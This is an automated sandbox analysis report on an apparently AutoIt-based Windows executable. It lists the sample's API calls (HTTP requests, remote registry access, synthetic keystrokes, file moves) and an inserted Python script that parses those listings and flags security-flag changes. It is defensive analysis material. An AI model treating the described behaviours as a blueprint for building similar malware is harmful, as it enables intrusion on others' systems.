• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-1603158881
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00479D1F
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 665237470-60002521
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ConnectRegistry_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 535477410-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
• Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
APIs
• _memset.LIBCMT ref: 0045F317
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
• IsMenu.USER32(?), ref: 0045F380
• CreatePopupMenu.USER32 ref: 0045F3C5
• GetMenuItemCount.USER32(?), ref: 0045F42F
• InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID: 0$2
• API String ID: 3311875123-3793063076
• Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
• Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
• Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
• Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
APIs
• GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\AENiBH7X1q.exe), ref: 0043719E
• LoadStringW.USER32(00000000), ref: 004371A7
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
• LoadStringW.USER32(00000000), ref: 004371C0
• _printf.LIBCMT ref: 004371EC
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
Strings
• C:\Users\user\Desktop\AENiBH7X1q.exe, xrefs: 00437189
• %s (%d) : ==> %s: %s %s, xrefs: 004371E7
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_printf
• String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\AENiBH7X1q.exe
• API String ID: 220974073-418114886
• Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
• Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
• Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
• Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
• Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
• Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
• Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
APIs
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AENiBH7X1q.exe,?,C:\Users\user\Desktop\AENiBH7X1q.exe,004A8E80,C:\Users\user\Desktop\AENiBH7X1q.exe,0040F3D2), ref: 0040FFCA
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• lstrcmpiW.KERNEL32(?,?), ref: 0045355E
• MoveFileW.KERNEL32(?,?), ref: 0045358E
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 978794511-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
• Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
• Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
• Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
APIs
  • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
  • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
  • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
• PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
• Sleep.KERNEL32(00000000), ref: 00445D70
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
• Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
• Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
• Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
• Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressProc_malloc$_strcat_strlen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AU3_FreeVar
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2184576858-771828931
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
• DestroyWindow.USER32(?), ref: 0042A751
• UnregisterHotKey.USER32(?), ref: 0042A778
• FreeLibrary.KERNEL32(?), ref: 0042A822
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
• String ID: close all
• API String ID: 4174999648-3243417748
• Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
• Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
• Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
• Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
• InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
• HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
• String ID:
• API String ID: 1291720006-3916222277
• Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
• Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
• Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
• Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
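The API bullets in these blocks are a compact record of a function's imports, call-site addresses and the constant arguments the decompiler could recover, and the hexadecimal arguments 0000001F and 00000005 in the block above are WinINet constants. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses the block's API bullets (copied verbatim as constructed input) into records, decodes the constants whose values I am certain of (INTERNET_OPTION_SECURITY_FLAGS = 0x1F, HTTP_QUERY_CONTENT_LENGTH = 5, HTTP_QUERY_STATUS_CODE = 19), and flags the query-then-set of the security flags that typically precedes relaxing TLS certificate validation. The report shows the value written as "?", so that check is a triage lead rather than proof that verification was disabled. The function names, record layout and the choice of constants to decode are my own.

```python
"""Parse Joe Sandbox 'APIs' bullets into records and decode WinINet constants.
Added example; SAMPLE is the API list of the report block above, copied verbatim."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: the seven API bullets of the block above, verbatim.
SAMPLE = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
• InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
• HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
"""

# One bullet: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE(arg,arg,...), ref: XXXXXXXX   (args are 8 hex digits or '?').
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Constants I am certain of from wininet.h; decoding is limited to these.
WININET_OPTIONS = {0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY_LEVELS = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE"}
# Which argument index carries a decodable constant, per API (hypothetical table).
CONST_ARG = {
    "InternetQueryOptionW": (1, WININET_OPTIONS),
    "InternetSetOptionW": (1, WININET_OPTIONS),
    "HttpQueryInfoW": (1, HTTP_QUERY_LEVELS),
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]      # int for a recovered constant, None for '?'
    ref: int                       # call-site address
    subcall_of: Optional[int] = None  # address of the callee when reported as a subcall


def parse_args(text: str) -> List[Optional[int]]:
    return [None if a.strip() == "?" else int(a, 16) for a in text.split(",")]


def parse_block(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        calls.append(ApiCall(api=m["api"], module=m["mod"],
                             args=parse_args(m["args"]), ref=int(m["ref"], 16),
                             subcall_of=int(m["sub"], 16) if m["sub"] else None))
    return calls


def decode_constant(call: ApiCall) -> Optional[str]:
    """Symbolic name of the call's decodable constant argument, or None."""
    spec = CONST_ARG.get(call.api)
    if spec is None:
        return None
    idx, table = spec
    if idx >= len(call.args) or call.args[idx] is None:
        return None
    return table.get(call.args[idx])


def security_flags_touched(calls: List[ApiCall]) -> bool:
    """True when the function both reads and writes INTERNET_OPTION_SECURITY_FLAGS.
    That read-modify-write is how callers OR SECURITY_FLAG_IGNORE_* bits into the
    flags; the value written is '?' in the report, so this is a lead, not proof."""
    seen = {c.api for c in calls
            if c.api in ("InternetQueryOptionW", "InternetSetOptionW")
            and len(c.args) > 1 and c.args[1] == 0x1F}
    return seen == {"InternetQueryOptionW", "InternetSetOptionW"}


def call_sequence(calls: List[ApiCall]) -> List[str]:
    """Direct (non-subcall) API names ordered by call-site address."""
    return [c.api for c in sorted(calls, key=lambda c: c.ref) if c.subcall_of is None]


if __name__ == "__main__":
    parsed = parse_block(SAMPLE)
    for c in parsed:
        tag = decode_constant(c)
        print(f"{c.ref:08X} {c.api}.{c.module}" + (f"  [{tag}]" if tag else ""))
    print("sequence:", " -> ".join(call_sequence(parsed)))
    print("security flags query+set:", security_flags_touched(parsed))
```

Running it orders the direct calls by address (InternetConnectW, HttpOpenRequestW, InternetQueryOptionW, InternetSetOptionW, HttpSendRequestW, HttpQueryInfoW), labels the 0x1F and 5 arguments, and reports the security-flags pairing; the same parser applies unchanged to the other blocks on the page, which is the point of keeping the constant tables separate from the line grammar.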
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLastselect
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 215497628-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3d89cdb4518712ce7d497f90f16eabf25f5dd16b03f437b50de1b9ff930cdf67
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
